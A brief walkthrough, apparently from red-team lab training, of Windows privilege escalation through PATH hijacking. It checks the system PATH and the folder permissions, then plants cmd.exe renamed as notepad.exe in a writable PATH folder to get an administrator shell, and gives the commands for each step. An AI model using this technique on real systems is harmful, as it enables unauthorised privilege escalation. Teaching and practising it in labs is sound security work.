First: Take a look at the Path Environment Variable

reg query "HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\Environment"

Notice that there is a path called C:\RTO\Bin which means if we can write to this path we can hijack the execution of any program

Second: Checking if we have write access to that folder

icacls C:\\RTO\\bin

And we have modified access to that folder

Third: Copy you malicious payload to that folder

copy c:\\Windows\\System32\\cmd.exe C:\\RTO\\bin\\notepad.exe

Now anyone using CMD and trying to open Notepad it will open a new CMD session let’s try this as admins

notepad.exe

And we are administrator